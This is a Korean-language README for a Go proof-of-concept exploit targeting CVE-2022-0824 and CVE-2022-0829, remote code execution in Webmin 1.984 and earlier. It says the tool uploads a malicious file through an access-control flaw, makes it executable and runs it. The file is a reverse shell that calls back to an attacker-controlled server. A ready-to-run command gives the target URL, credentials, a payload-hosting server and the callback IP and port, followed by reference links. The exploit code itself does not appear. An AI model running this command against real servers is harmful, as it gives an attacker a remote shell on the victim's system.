
CVE-2022-0824용 익스플로잇 PoC
Webmin <= 1.984에서의 RCE
CVE-2022-0824 및 CVE-2022-0829
이 도구는 Webmin의 BAC 취약점을 악용하여 악성 파일을 업로드하고, 파일의 권한을 변경한 뒤, 해당 파일을 실행합니다. 이 파일은, makePayload 함수에서 생성되며, 공격자가 제어하는 서버로 연결되는 리버스 셸입니다.
go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444
t -> 대상 URL
c -> Webmin 자격 증명
sl -> 페이로드를 호스팅할 로컬 서버 IP 및 포트
s -> 콜백 IP
p -> 콜백 포트
https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824